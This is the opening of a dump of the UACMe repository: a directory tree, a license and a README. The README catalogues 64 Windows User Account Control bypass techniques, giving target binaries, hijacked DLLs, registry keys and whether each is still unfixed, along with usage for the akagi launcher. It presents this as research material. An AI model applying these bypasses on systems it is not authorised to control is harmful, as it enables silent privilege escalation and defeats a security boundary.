Repository: hfiref0x/UACME
Branch: master
Commit: 6daa8d486250
Files: 168
Total size: 1.6 MB

Directory structure:

```
gitextract_23hrulia/
├── .gitattributes
├── Bin/
│   └── .empty
├── LICENSE.md
├── README.md
├── Source/
│   ├── Akagi/
│   │   ├── Resource.rc
│   │   ├── aic.c
│   │   ├── aic.h
│   │   ├── akagi.manifest
│   │   ├── appinfo/
│   │   │   ├── appinfo.acf
│   │   │   ├── appinfo.idl
│   │   │   ├── x64/
│   │   │   │   ├── appinfo64.c
│   │   │   │   └── appinfo64.h
│   │   │   └── x86-32/
│   │   │       ├── appinfo32.c
│   │   │       └── appinfo32.h
│   │   ├── bin/
│   │   │   ├── Akatsuki64.cd
│   │   │   ├── Fubuki32.cd
│   │   │   ├── Fubuki64.cd
│   │   │   └── Kamikaze.cd
│   │   ├── bin32res.h
│   │   ├── bin32res.rc
│   │   ├── bin64res.h
│   │   ├── bin64res.rc
│   │   ├── compress.c
│   │   ├── compress.h
│   │   ├── console.c
│   │   ├── console.h
│   │   ├── encresource.h
│   │   ├── fusutil.c
│   │   ├── fusutil.h
│   │   ├── global.h
│   │   ├── main.c
│   │   ├── makecab.c
│   │   ├── makecab.h
│   │   ├── methods/
│   │   │   ├── antonioCoco.c
│   │   │   ├── api0cradle.c
│   │   │   ├── azagarampur.c
│   │   │   ├── comsup.c
│   │   │   ├── comsup.h
│   │   │   ├── dwells.c
│   │   │   ├── elvint.h
│   │   │   ├── hakril.c
│   │   │   ├── hybrids.c
│   │   │   ├── methods.c
│   │   │   ├── methods.h
│   │   │   ├── rinn.c
│   │   │   ├── routines.h
│   │   │   ├── shellsup.c
│   │   │   ├── tyranid.c
│   │   │   ├── wusa.c
│   │   │   └── zcgonvh.c
│   │   ├── pcasvc/
│   │   │   ├── w7/
│   │   │   │   ├── pcasvc7.acf
│   │   │   │   ├── pcasvc7.idl
│   │   │   │   ├── x64/
│   │   │   │   │   ├── pcasvc7_64.c
│   │   │   │   │   └── pcasvc7_64.h
│   │   │   │   └── x86-32/
│   │   │   │       ├── pcasvc7_32.c
│   │   │   │       └── pcasvc7_32.h
│   │   │   └── w8_10/
│   │   │       ├── pcasvc.acf
│   │   │       ├── pcasvc.idl
│   │   │       ├── x64/
│   │   │       │   ├── pcasvc64.c
│   │   │       │   └── pcasvc64.h
│   │   │       └── x86-32/
│   │   │           ├── pcasvc32.c
│   │   │           └── pcasvc32.h
│   │   ├── resource.h
│   │   ├── stub.c
│   │   ├── stub.h
│   │   ├── sup.c
│   │   ├── sup.h
│   │   ├── tests/
│   │   │   ├── test.c
│   │   │   └── test.h
│   │   ├── uacme.vcxproj
│   │   ├── uacme.vcxproj.filters
│   │   ├── uacme.vcxproj.user
│   │   └── uas.h
│   ├── Akatsuki/
│   │   ├── Akatsuki.vcxproj
│   │   ├── Akatsuki.vcxproj.filters
│   │   ├── Akatsuki.vcxproj.user
│   │   ├── dllmain.c
│   │   ├── export.def
│   │   ├── resource.h
│   │   └── version.rc
│   ├── Fubuki/
│   │   ├── atldll.h
│   │   ├── dll.vcxproj
│   │   ├── dll.vcxproj.filters
│   │   ├── dll.vcxproj.user
│   │   ├── dllmain.c
│   │   ├── export.def
│   │   ├── fubuki.h
│   │   ├── pca.c
│   │   ├── pca.h
│   │   ├── resource.h
│   │   ├── uihacks.c
│   │   ├── uihacks.h
│   │   ├── version.rc
│   │   └── winmm.h
│   ├── Kamikaze/
│   │   ├── Kamikaze.msc
│   │   └── Launcher.html
│   ├── Naka/
│   │   ├── Naka.vcxproj
│   │   ├── Naka.vcxproj.filters
│   │   ├── Naka.vcxproj.user
│   │   ├── main.c
│   │   └── naka.h
│   ├── README.md
│   ├── Shared/
│   │   ├── _filename.c
│   │   ├── _filename.h
│   │   ├── _strcat.c
│   │   ├── _strcmp.c
│   │   ├── _strcmpi.c
│   │   ├── _strcpy.c
│   │   ├── _strend.c
│   │   ├── _strlen.c
│   │   ├── _strncmp.c
│   │   ├── _strncmpi.c
│   │   ├── _strncpy.c
│   │   ├── _strstri.c
│   │   ├── cmdline.c
│   │   ├── cmdline.h
│   │   ├── consts.h
│   │   ├── hde/
│   │   │   ├── hde64.c
│   │   │   ├── hde64.h
│   │   │   ├── pstdint.h
│   │   │   └── table64.h
│   │   ├── itostr.c
│   │   ├── ldr.c
│   │   ├── ldr.h
│   │   ├── libinc.h
│   │   ├── minirtl.h
│   │   ├── ntos/
│   │   │   ├── ntbuilds.h
│   │   │   ├── ntos.h
│   │   │   └── ntsxs.h
│   │   ├── rtltypes.h
│   │   ├── shared.h
│   │   ├── strtoi.c
│   │   ├── strtoul.c
│   │   ├── u64tohex.c
│   │   ├── u64tostr.c
│   │   ├── ultohex.c
│   │   ├── ultostr.c
│   │   ├── util.c
│   │   ├── util.h
│   │   ├── windefend.c
│   │   └── windefend.h
│   ├── Yuubari/
│   │   ├── Resource.rc
│   │   ├── Yuubari.vcxproj
│   │   ├── Yuubari.vcxproj.filters
│   │   ├── Yuubari.vcxproj.user
│   │   ├── appinfo.c
│   │   ├── appinfo.h
│   │   ├── basic.c
│   │   ├── basic.h
│   │   ├── comobj.c
│   │   ├── comobj.h
│   │   ├── consts.h
│   │   ├── cui.c
│   │   ├── cui.h
│   │   ├── fusion.c
│   │   ├── fusion.h
│   │   ├── global.h
│   │   ├── logger.c
│   │   ├── logger.h
│   │   ├── main.c
│   │   ├── resource.h
│   │   ├── sup.c
│   │   ├── sup.h
│   │   ├── tests/
│   │   │   ├── test_fusion.c
│   │   │   └── test_fusion.h
│   │   └── wintrustex.h
│   └── uacme.sln
└── appveyor.yml
```

================================================
FILE CONTENTS
================================================

================================================
FILE: .gitattributes
================================================
```
# Auto detect text files and perform LF normalization
* text=auto
```

================================================
FILE: LICENSE.md
================================================
Copyright (c) 2014 - 2025, UACMe Project

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

================================================
FILE: README.md
================================================
[![Build status](https://img.shields.io/appveyor/build/hfiref0x/uacme?logo=appveyor)](https://ci.appveyor.com/project/hfiref0x/uacme)
![Visitors](https://api.visitorbadge.io/api/visitors?path=https%3A%2F%2Fgithub.com%2Fhfiref0x%2Fuacme&countColor=%23263759&style=flat)

# UACMe

Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.
This project demonstrates various UAC bypass techniques and serves as an educational resource for understanding Windows security mechanisms.

> ⚠️ **Warning**: This tool demonstrates security vulnerabilities that could be exploited maliciously. Use responsibly and only in controlled environments.

# System Requirements

* **Operating Systems**: Windows 7/8/8.1/10/11 (x86-32/x64, client; some methods, however, also work on server versions)
* **User Account**: Administrator account with UAC set to default settings

## Usage

Run the executable from the command line using the following syntax:

```
akagi32.exe [Method_Number] [Optional_Command]
```

or

```
akagi64.exe [Method_Number] [Optional_Command]
```

### Parameters:

* **Method_Number**: Number corresponding to the UAC bypass method (see Methods List below)
* **Optional_Command**: Full path to an executable file to run with elevated privileges
  * If omitted, the program will launch an elevated command prompt (%systemroot%\system32\cmd.exe)

### Examples:

```
akagi32.exe 23
akagi64.exe 61
akagi32.exe 23 c:\windows\system32\calc.exe
akagi64.exe 61 c:\windows\system32\charmap.exe
```

> **Note**: Since version 3.5.0, all previously "fixed" methods are considered obsolete and have been removed. If you need them, use the [v3.2.x branch](https://github.com/hfiref0x/UACME/tree/v3.2.x).
Keys (click to expand/collapse) 1. Author: Leo Davidson * Type: Dll Hijack * Method: IFileOperation * Target(s): \system32\sysprep\sysprep.exe * Component(s): cryptbase.dll * Implementation: ucmStandardAutoElevation * Works from: Windows 7 (7600) * Fixed in: Windows 8.1 (9600) * How: sysprep.exe hardened LoadFrom manifest elements * Code status: removed starting from v3.5.0 :tractor: 2. Author: Leo Davidson derivative * Type: Dll Hijack * Method: IFileOperation * Target(s): \system32\sysprep\sysprep.exe * Component(s): ShCore.dll * Implementation: ucmStandardAutoElevation * Works from: Windows 8.1 (9600) * Fixed in: Windows 10 TP (> 9600) * How: Side effect of ShCore.dll moving to \KnownDlls * Code status: removed starting from v3.5.0 :tractor: 3. Author: Leo Davidson derivative by WinNT/Pitou * Type: Dll Hijack * Method: IFileOperation * Target(s): \system32\oobe\setupsqm.exe * Component(s): WdsCore.dll * Implementation: ucmStandardAutoElevation * Works from: Windows 7 (7600) * Fixed in: Windows 10 TH2 (10558) * How: Side effect of OOBE redesign * Code status: removed starting from v3.5.0 :tractor: 4. Author: Jon Ericson, WinNT/Gootkit, mzH * Type: AppCompat * Method: RedirectEXE Shim * Target(s): \system32\cliconfg.exe * Component(s): - * Implementation: ucmShimRedirectEXE * Works from: Windows 7 (7600) * Fixed in: Windows 10 TP (> 9600) * How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versions * Code status: removed starting from v3.5.0 :tractor: 5. Author: WinNT/Simda * Type: Elevated COM interface * Method: ISecurityEditor * Target(s): HKLM registry keys * Component(s): - * Implementation: ucmSimdaTurnOffUac * Works from: Windows 7 (7600) * Fixed in: Windows 10 TH1 (10147) * How: ISecurityEditor interface method changed * Code status: removed starting from v3.5.0 :tractor: 6. 
Author: Win32/Carberp * Type: Dll Hijack * Method: WUSA * Target(s): \ehome\mcx2prov.exe, \system32\migwiz\migwiz.exe * Component(s): WdsCore.dll, CryptBase.dll, CryptSP.dll * Implementation: ucmWusaMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 TH1 (10147) * How: WUSA /extract option removed * Code status: removed starting from v3.5.0 :tractor: 7. Author: Win32/Carberp derivative * Type: Dll Hijack * Method: WUSA * Target(s): \system32\cliconfg.exe * Component(s): ntwdblib.dll * Implementation: ucmWusaMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 TH1 (10147) * How: WUSA /extract option removed * Code status: removed starting from v3.5.0 :tractor: 8. Author: Leo Davidson derivative by Win32/Tilon * Type: Dll Hijack * Method: IFileOperation * Target(s): \system32\sysprep\sysprep.exe * Component(s): Actionqueue.dll * Implementation: ucmStandardAutoElevation * Works from: Windows 7 (7600) * Fixed in: Windows 8.1 (9600) * How: sysprep.exe hardened LoadFrom manifest * Code status: removed starting from v3.5.0 :tractor: 9. Author: Leo Davidson, WinNT/Simda, Win32/Carberp derivative * Type: Dll Hijack * Method: IFileOperation, ISecurityEditor, WUSA * Target(s): IFEO registry keys, \system32\cliconfg.exe * Component(s): Attacker defined Application Verifier Dll * Implementation: ucmAvrfMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 TH1 (10147) * How: WUSA /extract option removed, ISecurityEditor interface method changed * Code status: removed starting from v3.5.0 :tractor: 10. Author: WinNT/Pitou, Win32/Carberp derivative * Type: Dll Hijack * Method: IFileOperation, WUSA * Target(s): \system32\\{New}or{Existing}\\{autoelevated}.exe, e.g. winsat.exe * Component(s): Attacker defined dll, e.g. PowProf.dll, DevObj.dll * Implementation: ucmWinSATMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 TH2 (10548) * How: AppInfo elevated application path control hardening * Code status: removed starting from v3.5.0 :tractor: 11. 
Author: Jon Ericson, WinNT/Gootkit, mzH * Type: AppCompat * Method: Shim Memory Patch * Target(s): \system32\iscsicli.exe * Component(s): Attacker prepared shellcode * Implementation: ucmShimPatch * Works from: Windows 7 (7600) * Fixed in: Windows 8.1 (9600) * How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versions * Code status: removed starting from v3.5.0 :tractor: 12. Author: Leo Davidson derivative * Type: Dll Hijack * Method: IFileOperation * Target(s): \system32\sysprep\sysprep.exe * Component(s): dbgcore.dll * Implementation: ucmStandardAutoElevation * Works from: Windows 10 TH1 (10240) * Fixed in: Windows 10 TH2 (10565) * How: sysprep.exe manifest updated * Code status: removed starting from v3.5.0 :tractor: 13. Author: Leo Davidson derivative * Type: Dll Hijack * Method: IFileOperation * Target(s): \system32\mmc.exe EventVwr.msc * Component(s): elsext.dll * Implementation: ucmMMCMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS1 (14316) * How: Missing dependency removed * Code status: removed starting from v3.5.0 :tractor: 14. Author: Leo Davidson, WinNT/Sirefef derivative * Type: Dll Hijack * Method: IFileOperation * Target(s): \system\credwiz.exe, \system32\wbem\oobe.exe * Component(s): netutils.dll * Implementation: ucmSirefefMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 TH2 (10548) * How: AppInfo elevated application path control hardening * Code status: removed starting from v3.5.0 :tractor: 15. Author: Leo Davidson, Win32/Addrop, Metasploit derivative * Type: Dll Hijack * Method: IFileOperation * Target(s): \system32\cliconfg.exe * Component(s): ntwdblib.dll * Implementation: ucmGenericAutoelevation * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS1 (14316) * How: Cliconfg.exe autoelevation removed * Code status: removed starting from v3.5.0 :tractor: 16. 
Author: Leo Davidson derivative * Type: Dll Hijack * Method: IFileOperation * Target(s): \system32\GWX\GWXUXWorker.exe, \system32\inetsrv\inetmgr.exe * Component(s): SLC.dll * Implementation: ucmGWX * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS1 (14316) * How: AppInfo elevated application path control and inetmgr executable hardening * Code status: removed starting from v3.5.0 :tractor: 17. Author: Leo Davidson derivative * Type: Dll Hijack (Import forwarding) * Method: IFileOperation * Target(s): \system32\sysprep\sysprep.exe * Component(s): unbcl.dll * Implementation: ucmStandardAutoElevation2 * Works from: Windows 8.1 (9600) * Fixed in: Windows 10 RS1 (14371) * How: sysprep.exe manifest updated * Code status: removed starting from v3.5.0 :tractor: 18. Author: Leo Davidson derivative * Type: Dll Hijack (Manifest) * Method: IFileOperation * Target(s): \system32\taskhost.exe, \system32\tzsync.exe (any ms exe without manifest) * Component(s): Attacker defined * Implementation: ucmAutoElevateManifest * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS1 (14371) * How: Manifest parsing logic reviewed * Code status: removed starting from v3.5.0 :tractor: 19. Author: Leo Davidson derivative * Type: Dll Hijack * Method: IFileOperation * Target(s): \system32\inetsrv\inetmgr.exe * Component(s): MsCoree.dll * Implementation: ucmInetMgrMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS1 (14376) * How: inetmgr.exe executable manifest hardening, MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images * Code status: removed starting from v3.5.0 :tractor: 20. Author: Leo Davidson derivative * Type: Dll Hijack * Method: IFileOperation * Target(s): \system32\mmc.exe, Rsop.msc * Component(s): WbemComn.dll * Implementation: ucmMMCMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS3 (16232) * How: Target requires wbemcomn.dll to be signed by MS * Code status: removed starting from v3.5.0 :tractor: 21. 
Author: Leo Davidson derivative * Type: Dll Hijack * Method: IFileOperation, SxS DotLocal * Target(s): \system32\sysprep\sysprep.exe * Component(s): comctl32.dll * Implementation: ucmSXSMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS3 (16232) * How: MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images * Code status: removed starting from v3.5.0 :tractor: 22. Author: Leo Davidson derivative * Type: Dll Hijack * Method: IFileOperation, SxS DotLocal * Target(s): \system32\consent.exe * Component(s): comctl32.dll * Implementation: ucmSXSMethod * Works from: Windows 7 (7600) * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v2.5.0 23. Author: Leo Davidson derivative * Type: Dll Hijack * Method: IFileOperation * Target(s): \system32\pkgmgr.exe * Component(s): DismCore.dll * Implementation: ucmDismMethod * Works from: Windows 7 (7600) * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v2.5.1 24. Author: BreakingMalware * Type: Shell API * Method: Environment variables expansion * Target(s): \system32\CompMgmtLauncher.exe * Component(s): Attacker defined * Implementation: ucmCometMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS2 (15031) * How: CompMgmtLauncher.exe autoelevation removed * Code status: removed starting from v3.5.0 :tractor: 25. Author: Enigma0x3 * Type: Shell API * Method: Registry key manipulation * Target(s): \system32\EventVwr.exe, \system32\CompMgmtLauncher.exe * Component(s): Attacker defined * Implementation: ucmHijackShellCommandMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS2 (15031) * How: EventVwr.exe redesigned, CompMgmtLauncher.exe autoelevation removed * Code status: removed starting from v3.5.0 :tractor: 26. 
Author: Enigma0x3 * Type: Race Condition * Method: File overwrite * Target(s): %temp%\GUID\dismhost.exe * Component(s): LogProvider.dll * Implementation: ucmDiskCleanupRaceCondition * Works from: Windows 10 TH1 (10240) * AlwaysNotify compatible * Fixed in: Windows 10 RS2 (15031) * How: File security permissions altered * Code status: removed starting from v3.5.0 :tractor: 27. Author: ExpLife * Type: Elevated COM interface * Method: IARPUninstallStringLauncher * Target(s): Attacker defined * Component(s): Attacker defined * Implementation: ucmUninstallLauncherMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS3 (16199) * How: UninstallStringLauncher interface removed from COMAutoApprovalList * Code status: removed starting from v3.5.0 :tractor: 28. Author: Exploit/Sandworm * Type: Whitelisted component * Method: InfDefaultInstall * Target(s): Attacker defined * Component(s): Attacker defined * Implementation: ucmSandwormMethod * Works from: Windows 7 (7600) * Fixed in: Windows 8.1 (9600) * How: InfDefaultInstall.exe removed from g_lpAutoApproveEXEList (MS14-060) * Code status: removed starting from v3.5.0 :tractor: 29. Author: Enigma0x3 * Type: Shell API * Method: Registry key manipulation * Target(s): \system32\sdclt.exe * Component(s): Attacker defined * Implementation: ucmAppPathMethod * Works from: Windows 10 TH1 (10240) * Fixed in: Windows 10 RS3 (16215) * How: Shell API update * Code status: removed starting from v3.5.0 :tractor: 30. Author: Leo Davidson derivative, lhc645 * Type: Dll Hijack * Method: WOW64 logger * Target(s): \syswow64\\{any elevated exe, e.g wusa.exe} * Component(s): wow64log.dll * Implementation: ucmWow64LoggerMethod * Works from: Windows 7 (7600) * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v2.7.0 31. 
Author: Enigma0x3 * Type: Shell API * Method: Registry key manipulation * Target(s): \system32\sdclt.exe * Component(s): Attacker defined * Implementation: ucmSdcltIsolatedCommandMethod * Works from: Windows 10 TH1 (10240) * Fixed in: Windows 10 RS4 (17025) * How: Shell API / Windows components update * Code status: removed starting from v3.5.0 :tractor: 32. Author: xi-tauw * Type: Dll Hijack * Method: UIPI bypass with uiAccess application * Target(s): \Program Files\Windows Media Player\osk.exe, \system32\EventVwr.exe, \system32\mmc.exe * Component(s): duser.dll, osksupport.dll * Implementation: ucmUiAccessMethod * Works from: Windows 7 (7600) * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v2.7.1 33. Author: winscripting.blog * Type: Shell API * Method: Registry key manipulation * Target(s): \system32\fodhelper.exe * Component(s): Attacker defined * Implementation: ucmShellRegModMethod * Works from: Windows 10 TH1 (10240) * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v2.7.2 34. Author: James Forshaw * Type: Shell API * Method: Environment variables expansion * Target(s): \system32\svchost.exe via \system32\schtasks.exe * Component(s): Attacker defined * Implementation: ucmDiskCleanupEnvironmentVariable * Works from: Windows 8.1 (9600) * AlwaysNotify compatible * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v2.7.2 35. Author: CIA & James Forshaw * Type: Impersonation * Method: Token Manipulations * Target(s): Autoelevated applications * Component(s): Attacker defined * Implementation: ucmTokenModification * Works from: Windows 7 (7600) * AlwaysNotify compatible, see note * Fixed in: Windows 10 RS5 (17686) * How: ntoskrnl.exe->SeTokenCanImpersonate additional access token check added * Code status: removed starting from v3.5.0 :tractor: 36. 
Author: Thomas Vanhoutte aka SandboxEscaper * Type: Race condition * Method: NTFS reparse point & Dll Hijack * Target(s): wusa.exe, pkgmgr.exe * Component(s): Attacker defined * Implementation: ucmJunctionMethod * Works from: Windows 7 (7600) * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v2.7.4 37. Author: Ernesto Fernandez, Thomas Vanhoutte * Type: Dll Hijack * Method: SxS DotLocal, NTFS reparse point * Target(s): \system32\dccw.exe * Component(s): GdiPlus.dll * Implementation: ucmSXSDccwMethod * Works from: Windows 7 (7600) * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v2.7.5 38. Author: Clement Rouault * Type: Whitelisted component * Method: APPINFO command line spoofing * Target(s): \system32\mmc.exe * Component(s): Attacker defined * Implementation: ucmHakrilMethod * Works from: Windows 7 (7600) * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v2.7.6 39. Author: Stefan Kanthak * Type: Dll Hijack * Method: .NET Code Profiler * Target(s): \system32\mmc.exe * Component(s): Attacker defined * Implementation: ucmCorProfilerMethod * Works from: Windows 7 (7600) * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v2.7.7 40. Author: Ruben Boonen * Type: COM Handler Hijack * Method: Registry key manipulation * Target(s): \system32\mmc.exe, \system32\recdisc.exe * Component(s): Attacker defined * Implementation: ucmCOMHandlersMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 19H1 (18362) * How: Side effect of Windows changes * Code status: removed starting from v3.5.0 :tractor: 41. Author: Oddvar Moe * Type: Elevated COM interface * Method: ICMLuaUtil * Target(s): Attacker defined * Component(s): Attacker defined * Implementation: ucmCMLuaUtilShellExecMethod * Works from: Windows 7 (7600) * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v2.7.9 42. 
Author: BreakingMalware and Enigma0x3 * Type: Elevated COM interface * Method: IFwCplLua * Target(s): Attacker defined * Component(s): Attacker defined * Implementation: ucmFwCplLuaMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS4 (17134) * How: Shell API update * Code status: removed starting from v3.5.0 :tractor: 43. Author: Oddvar Moe derivative * Type: Elevated COM interface * Method: IColorDataProxy, ICMLuaUtil * Target(s): Attacker defined * Component(s): Attacker defined * Implementation: ucmDccwCOMMethod * Works from: Windows 7 (7600) * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v2.8.3 44. Author: bytecode77 * Type: Shell API * Method: Environment variables expansion * Target(s): Multiple auto-elevated processes * Component(s): Various per target * Implementation: ucmVolatileEnvMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS3 (16299) * How: Current user system directory variables ignored during process creation * Code status: removed starting from v3.5.0 :tractor: 45. Author: bytecode77 * Type: Shell API * Method: Registry key manipulation * Target(s): \system32\slui.exe * Component(s): Attacker defined * Implementation: ucmSluiHijackMethod * Works from: Windows 8.1 (9600) * Fixed in: Windows 10 20H1 (19041) * How: Side effect of Windows changes * Code status: removed starting from v3.5.0 :tractor: 46. Author: Anonymous * Type: Race Condition * Method: Registry key manipulation * Target(s): \system32\BitlockerWizardElev.exe * Component(s): Attacker defined * Implementation: ucmBitlockerRCMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS4 (>16299) * How: Shell API update * Code status: removed starting from v3.5.0 :tractor: 47. 
Author: clavoillotte & 3gstudent * Type: COM Handler Hijack * Method: Registry key manipulation * Target(s): \system32\mmc.exe * Component(s): Attacker defined * Implementation: ucmCOMHandlersMethod2 * Works from: Windows 7 (7600) * Fixed in: Windows 10 19H1 (18362) * How: Side effect of Windows changes * Code status: removed starting from v3.5.0 :tractor: 48. Author: deroko * Type: Elevated COM interface * Method: ISPPLUAObject * Target(s): Attacker defined * Component(s): Attacker defined * Implementation: ucmSPPLUAObjectMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS5 (17763) * How: ISPPLUAObject interface method changed * Code status: removed starting from v3.5.0 :tractor: 49. Author: RinN * Type: Elevated COM interface * Method: ICreateNewLink * Target(s): \system32\TpmInit.exe * Component(s): WbemComn.dll * Implementation: ucmCreateNewLinkMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS1 (14393) * How: Side effect of consent.exe COMAutoApprovalList introduction * Code status: removed starting from v3.5.0 :tractor: 50. Author: Anonymous * Type: Elevated COM interface * Method: IDateTimeStateWrite, ISPPLUAObject * Target(s): w32time service * Component(s): w32time.dll * Implementation: ucmDateTimeStateWriterMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS5 (17763) * How: Side effect of ISPPLUAObject interface change * Code status: removed starting from v3.5.0 :tractor: 51. Author: bytecode77 derivative * Type: Elevated COM interface * Method: IAccessibilityCplAdmin * Target(s): \system32\rstrui.exe * Component(s): Attacker defined * Implementation: ucmAcCplAdminMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS4 (17134) * How: Shell API update * Code status: removed starting from v3.5.0 :tractor: 52. 
Author: David Wells * Type: Whitelisted component * Method: AipNormalizePath parsing abuse * Target(s): Attacker defined * Component(s): Attacker defined * Implementation: ucmDirectoryMockMethod * Works from: Windows 7 (7600) * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v3.0.4 53. Author: Emeric Nasi * Type: Shell API * Method: Registry key manipulation * Target(s): \system32\sdclt.exe * Component(s): Attacker defined * Implementation: ucmShellRegModMethod * Works from: Windows 10 (14393) * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v3.1.3 54. Author: egre55 * Type: Dll Hijack * Method: Dll path search abuse * Target(s): \syswow64\SystemPropertiesAdvanced.exe and other SystemProperties*.exe * Component(s): \AppData\Local\Microsoft\WindowsApps\srrstr.dll * Implementation: ucmEgre55Method * Works from: Windows 10 (14393) * Fixed in: Windows 10 19H1 (18362) * How: SysDm.cpl!_CreateSystemRestorePage has been updated for secured load library call * Code status: removed starting from v3.5.0 :tractor: 55. Author: James Forshaw * Type: GUI Hack * Method: UIPI bypass with token modification * Target(s): \system32\osk.exe, \system32\msconfig.exe * Component(s): Attacker defined * Implementation: ucmTokenModUIAccessMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS5 (17763), a part of patch, 2024 year * How: When integrity level of an UIAccess token is lowered, the UIAccess property is removed * Code status: added in v3.1.5 56. Author: Hashim Jawad * Type: Shell API * Method: Registry key manipulation * Target(s): \system32\WSReset.exe * Component(s): Attacker defined * Implementation: ucmShellRegModMethod2 * Works from: Windows 10 (17134) * Fixed in: Windows 11 (22000) * How: Windows components redesign * Code status: removed starting from v3.5.7 :tractor: 57. 
Author: Leo Davidson derivative by Win32/Gapz * Type: Dll Hijack * Method: IFileOperation * Target(s): \system32\sysprep\sysprep.exe * Component(s): unattend.dll * Implementation: ucmStandardAutoElevation * Works from: Windows 7 (7600) * Fixed in: Windows 8.1 (9600) * How: sysprep.exe hardened LoadFrom manifest elements * Code status: removed starting from v3.5.0 :tractor: 58. Author: RinN * Type: Elevated COM interface * Method: IEditionUpgradeManager * Target(s): \system32\clipup.exe * Component(s): Attacker defined * Implementation: ucmEditionUpgradeManagerMethod * Works from: Windows 10 (14393) * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v3.2.0 59. Author: James Forshaw * Type: AppInfo ALPC * Method: RAiLaunchAdminProcess and DebugObject * Target(s): Attacker defined * Component(s): Attacker defined * Implementation: ucmDebugObjectMethod * Works from: Windows 7 (7600) * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v3.2.3 60. Author: Enigma0x3 derivative by WinNT/Glupteba * Type: Shell API * Method: Registry key manipulation * Target(s): \system32\CompMgmtLauncher.exe * Component(s): Attacker defined * Implementation: ucmGluptebaMethod * Works from: Windows 7 (7600) * Fixed in: Windows 10 RS2 (15063) * How: CompMgmtLauncher.exe autoelevation removed * Code status: removed starting from v3.5.0 :tractor: 61. Author: Enigma0x3/bytecode77 derivative by Nassim Asrir * Type: Shell API * Method: Registry key manipulation * Target(s): \system32\slui.exe, \system32\changepk.exe * Component(s): Attacker defined * Implementation: ucmShellRegModMethod * Works from: Windows 10 (14393) * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v3.2.5 62. 
Author: winscripting.blog
  * Type: Shell API
  * Method: Registry key manipulation
  * Target(s): \system32\computerdefaults.exe
  * Component(s): Attacker defined
  * Implementation: ucmShellRegModMethod
  * Works from: Windows 10 RS4 (17134)
  * Fixed in: unfixed :see_no_evil:
  * How: -
  * Code status: added in v3.2.6

63. Author: Arush Agarampur
  * Type: Dll Hijack
  * Method: ISecurityEditor
  * Target(s): Native Image Cache elements
  * Component(s): Attacker defined
  * Implementation: ucmNICPoisonMethod
  * Works from: Windows 7 (7600)
  * Fixed in: unfixed :see_no_evil:
  * How: -
  * Code status: added in v3.2.7

64. Author: Arush Agarampur
  * Type: Elevated COM interface
  * Method: IIEAxiAdminInstaller, IIEAxiInstaller2, IFileOperation
  * Target(s): IE add-on install cache
  * Component(s): Attacker defined
  * Implementation: ucmIeAddOnInstallMethod
  * Works from: Windows 7 (7600)
  * Fixed in: unfixed :see_no_evil:
  * How: -
